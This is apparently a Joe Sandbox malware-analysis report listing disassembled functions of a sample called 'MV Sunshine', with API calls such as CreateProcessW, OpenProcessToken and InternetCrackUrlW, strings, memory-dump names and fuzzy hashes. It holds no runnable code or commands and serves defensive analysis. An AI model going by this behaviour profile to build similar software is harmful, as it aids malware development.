Function 006AB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 006AB59E
ScreenToClient.USER32(?,?), ref: 006AB5B6
ScreenToClient.USER32(?,?), ref: 006AB5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 006AB5F5

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 377ae6a9cd6164012e9225653ef7b8da3f302aea6ca82c2d5c2d033628dcdce8
Instruction ID: cac8ec3ad3c7753f55ef0923589985c990d86fc7ee1ca3b705f31ddd924023ca
Opcode Fuzzy Hash: 377ae6a9cd6164012e9225653ef7b8da3f302aea6ca82c2d5c2d033628dcdce8
Instruction Fuzzy Hash: 821143B9D00209EFDB41DFA9C8849EEFBB9FF09310F109166E914E3220D735AA558F91

Function 006AB8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006AB8FE
_memset.LIBCMT ref: 006AB90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006E7F20,006E7F64), ref: 006AB93C
CloseHandle.KERNEL32 ref: 006AB94E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 07457b1e8d205de205993c3c663b6cb2b938b322c5dcb4cc67d2ba4dcd039f21
Instruction ID: 809195307a431a75c64112ca344fc0b36d161dbe92eaf8888e1924de25553eca
Opcode Fuzzy Hash: 07457b1e8d205de205993c3c663b6cb2b938b322c5dcb4cc67d2ba4dcd039f21
Instruction Fuzzy Hash: C5F05EB25443907BE7102BA1AC45FBB3A5EEB09754F006020BA08DA292D7715D008BA9

Function 00686E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00686E88

Part of subcall function 0068794E: _memset.LIBCMT ref: 00687983

_memmove.LIBCMT ref: 00686EAB
_memset.LIBCMT ref: 00686EB8
LeaveCriticalSection.KERNEL32(?), ref: 00686EC8

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 46405992f5784488ae63f365d759d781fb5c6ec20802cf392a64b7dea0342c52
Instruction ID: bf447460e7ab74d6fd53df3e8ceb13e7c7b0e2b34e2518b6206a69fdc64d397b
Opcode Fuzzy Hash: 46405992f5784488ae63f365d759d781fb5c6ec20802cf392a64b7dea0342c52
Instruction Fuzzy Hash: FAF0543A100210ABCF517F95DC85B89BB2BEF45320B048165FE085F226C731E951DBB5

Function 006AC00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 006212F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0062134D
Part of subcall function 006212F3: SelectObject.GDI32(?,00000000), ref: 0062135C
Part of subcall function 006212F3: BeginPath.GDI32(?), ref: 00621373
Part of subcall function 006212F3: SelectObject.GDI32(?,00000000), ref: 0062139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 006AC030
LineTo.GDI32(00000000,?,?), ref: 006AC03D
EndPath.GDI32(00000000), ref: 006AC04D
StrokePath.GDI32(00000000), ref: 006AC05B

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 658d52f9987636d031b168cf7cbc930042e26ffd06a85dab85851e78c899c216
Instruction ID: 01c240460ac288ce74352cef50c5ec0a27b7a166f2f8eb39a675125dc5623ba7
Opcode Fuzzy Hash: 658d52f9987636d031b168cf7cbc930042e26ffd06a85dab85851e78c899c216
Instruction Fuzzy Hash: FAF03A31005659BADB226F94AC09FCE3B9AAF16321F044000FA11651E287A56A61CFAA

Function 0067A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0067A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 0067A3AC
GetCurrentThreadId.KERNEL32 ref: 0067A3B3
AttachThreadInput.USER32(00000000), ref: 0067A3BA

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: d25a1f70bd8462a6dc5a27365134b68e3022f2ca0070e27cd824a3763fcc6c42
Instruction ID: adb5c4bd7943dbf9f0297533f764b0668149523ff7cb94be4289d3f1afe278e4
Opcode Fuzzy Hash: d25a1f70bd8462a6dc5a27365134b68e3022f2ca0070e27cd824a3763fcc6c42
Instruction Fuzzy Hash: DEE0C931545228BADB206FE2DC0DEDB7F5EEF167A2F009025F509D50A0C6719941DBA2

Function 00622218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00622231
SetTextColor.GDI32(?,000000FF), ref: 0062223B
SetBkMode.GDI32(?,00000001), ref: 00622250
GetStockObject.GDI32(00000005), ref: 00622258
GetWindowDC.USER32(?,00000000), ref: 0065C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 0065C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 0065C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 0065C112
GetPixel.GDI32(00000000,?,?), ref: 0065C132
ReleaseDC.USER32(?,00000000), ref: 0065C13D

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 66adb9021bda08a95de25b2a6e7f92d3b9ea7bbdecc4ba7db1583ef78306338f
Instruction ID: 13a27fad79b204a8258249d911650b339c04d6ec3270033407eb517f3f72bc6f
Opcode Fuzzy Hash: 66adb9021bda08a95de25b2a6e7f92d3b9ea7bbdecc4ba7db1583ef78306338f
Instruction Fuzzy Hash: 21E06D32600244EEDB216FA4FC0D7D87B12EB16332F0083B6FA69480E1C7724984DF22

Function 00678C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00678C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,0067882E), ref: 00678C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0067882E), ref: 00678C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,0067882E), ref: 00678C7E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 599a1aa206e2877b6037641aae3f964d641e13cb3709255089491b179a54bb0c
Instruction ID: 178f6e439774b97e511e9118b5ba7de829e0134bfb976f277101de4bf0c9e435
Opcode Fuzzy Hash: 599a1aa206e2877b6037641aae3f964d641e13cb3709255089491b179a54bb0c
Instruction Fuzzy Hash: 96E08636642211DFD7206FF16D0CF977BAEEF52792F089828B245CA040DA349841CF62

Function 00662187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00662187
GetDC.USER32(00000000), ref: 00662191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 006621B1
ReleaseDC.USER32(?), ref: 006621D2

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 887c410e605a6b00e5389a9ed37f08bcc670214824c49b1eae8e9166d3badec6
Instruction ID: fb15ce37bb346f20c0c07abf9c36f52699f3e24fef7d337cb577a2afb511482c
Opcode Fuzzy Hash: 887c410e605a6b00e5389a9ed37f08bcc670214824c49b1eae8e9166d3badec6
Instruction Fuzzy Hash: 72E01A75800614EFDB11AFA0D808A9D7BF3EB4D351F109429FD5A97220CB39A1429F41

Function 0066219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0066219B
GetDC.USER32(00000000), ref: 006621A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 006621B1
ReleaseDC.USER32(?), ref: 006621D2

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: da11444b882f8c5af480efb3250e73150b8ed80173e6e588279b86cb3464e5fd
Instruction ID: 7e0f188788198677d11365366ed846d01b7318dfa3bf28374623bafcfd7ac8d6
Opcode Fuzzy Hash: da11444b882f8c5af480efb3250e73150b8ed80173e6e588279b86cb3464e5fd
Instruction Fuzzy Hash: 90E01A75C00614AFCB11AFB0D80869D7BF2EB4D311F109029F95A97220CB39A1419F41

Function 006263A0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%k, xrefs: 006263AE

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID: %k
API String ID: 0-3601005739
Opcode ID: f3f86727d95771bf9a923ee5ac8f74f12963b9ed1034d39dde34a92729345fa2
Instruction ID: 6da8a1d4ac3de5a4fd98a6a03ee79ed2a4268b73f7116b6ea1e9b16e36443add
Opcode Fuzzy Hash: f3f86727d95771bf9a923ee5ac8f74f12963b9ed1034d39dde34a92729345fa2
Instruction Fuzzy Hash: ACB1B27180092A9BCF24EF94E4819FDB7B6FF04310F50812AF942A7295DB349E86CF65

Function 0069B1B7 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0069B2C3

Strings

xrn, xrefs: 0069B2F9
xrn, xrefs: 0069B325

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __itow_s
String ID: xrn$xrn
API String ID: 3653519197-3769791102
Opcode ID: b0c175dd85b4c427ddd5926c27fea40169d6ab4dbc08e2fae08a05af2c26989b
Instruction ID: 1f181e99ffbc4de068c55fd43ded68fb9bfd421e7f5a554b3157d44fe28c68e1
Opcode Fuzzy Hash: b0c175dd85b4c427ddd5926c27fea40169d6ab4dbc08e2fae08a05af2c26989b
Instruction Fuzzy Hash: 6DB17C70A00209AFDF14DF54E990EBEB7BAEF58300F149159F9459B292DB70EA41CB64

Function 0068B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0063FEC6: _wcscpy.LIBCMT ref: 0063FEE9

Part of subcall function 00629997: __itow.LIBCMT ref: 006299C2
Part of subcall function 00629997: __swprintf.LIBCMT ref: 00629A0C

__wcsnicmp.LIBCMT ref: 0068B298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0068B361

Strings

LPT, xrefs: 0068B292

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: a6abff87e516407ac35e9b0c6bc81964f118529ac78a57814aa45cdb5ec3c5c7
Instruction ID: 18dfe33db56ca644d23aa05027dfe221b2ef9d7a809e66d3f96204d6fb7f27eb
Opcode Fuzzy Hash: a6abff87e516407ac35e9b0c6bc81964f118529ac78a57814aa45cdb5ec3c5c7
Instruction Fuzzy Hash: 0A61A275E00215AFCB14EF94D891EEEB7B6AF08310F15915DF506AB351DB70AE80CB94

Function 00668A77 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00668B1E
_memmove.LIBCMT ref: 00668B78

Strings

Oac, xrefs: 00668BF2, 0066E39A, 0066E3B6

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memmove
String ID: Oac
API String ID: 4104443479-752515563
Opcode ID: 4ff7708eaa290a61569ff269f946033c7988c456347a61d48ae920c10b2a3504
Instruction ID: 01aa788b4907fd3fb88a0e2583c1a7687164a21ba5b9c07121daf9123ba57662
Opcode Fuzzy Hash: 4ff7708eaa290a61569ff269f946033c7988c456347a61d48ae920c10b2a3504
Instruction Fuzzy Hash: 205120749006099FCF64CFA8C884AAEB7B2FF44314F14455AE85AD7350DB31A995CB51

Function 00632AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00632AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00632AE1

Strings

@, xrefs: 00632AD5

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 4ece3ce8ce129f2286f2213516cfbc6d29cbf4cafca8cbc93423224e75914c85
Instruction ID: 28d8021b566ed1961685997d469f8357f7f8230436e23bfe95738d978ec3c6da
Opcode Fuzzy Hash: 4ece3ce8ce129f2286f2213516cfbc6d29cbf4cafca8cbc93423224e75914c85
Instruction Fuzzy Hash: 03514871418B549BD360AF10E886BABBBE8FFC4314F42485DF1D9411A5DB309929CB6A

Function 006899BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0062506B: __fread_nolock.LIBCMT ref: 00625089

_wcscmp.LIBCMT ref: 00689AAE
_wcscmp.LIBCMT ref: 00689AC1

Strings

FILE, xrefs: 006899FA

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 82a1c39cd0337545f19ee48860c09506e8502bf6455eb9604b9842e3dc0f143a
Instruction ID: 4c3fa4543b21a351c3798e657b383dd758c08271cecba6a051be839d3209eab6
Opcode Fuzzy Hash: 82a1c39cd0337545f19ee48860c09506e8502bf6455eb9604b9842e3dc0f143a
Instruction Fuzzy Hash: 0141D671A0061ABADF20AAA0DC45FEFBBBEDF45710F04006DF901A7281DA759A048BB5

Function 0066099E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 006609A9

Strings

Dtn, xrefs: 0062A2B1
Dtn, xrefs: 0062A477

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ClearVariant
String ID: Dtn$Dtn
API String ID: 1473721057-570680631
Opcode ID: bc7e67daf2380e643e3b4a7f2f4d7dce6aca76a79e2c65eaf3c8d42eee87d080
Instruction ID: 96346b28f33d02202041bc27e4660aaa83b4336bab918051cf38a1412e6903f3
Opcode Fuzzy Hash: bc7e67daf2380e643e3b4a7f2f4d7dce6aca76a79e2c65eaf3c8d42eee87d080
Instruction Fuzzy Hash: 90510278608752CFD754CF59D480A6ABBE2BB99344F54885CE9818B361E372EC81CF82

Function 00692882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00692892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006928C8

Strings

|, xrefs: 00692899

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 77d91c5660e88e2a30ba0671e7a06a3e0630456430dc6a335d19d7d3e75ce0e2
Instruction ID: 31efa768d7c38be9ce24ee9bf7eaa9709e71421c72249b35972c5e2d8000c632
Opcode Fuzzy Hash: 77d91c5660e88e2a30ba0671e7a06a3e0630456430dc6a335d19d7d3e75ce0e2
Instruction Fuzzy Hash: D8311C7180011AAFCF41DFA1DC85EEEBFBAFF08300F104029F815A6265EA355956DB61

Function 006A6CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 006A6D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 006A6DC2

Strings

static, xrefs: 006A6D22

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: c44edaddbfba3398d2e5ebd2715c0933b154f6155e4b1e9c8b1663fc38b1090f
Instruction ID: 3b4775a907744276cf47c0a31490230f7c0536a1e7299d1eddd9a39bcafb3bd0
Opcode Fuzzy Hash: c44edaddbfba3398d2e5ebd2715c0933b154f6155e4b1e9c8b1663fc38b1090f
Instruction Fuzzy Hash: 2431A171200604AEDB10AF74DC81AFB77BAFF49760F14961DF99697190CA31AC51CF64

Function 00682D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00682E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00682E3B

Strings

0, xrefs: 00682DF9

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
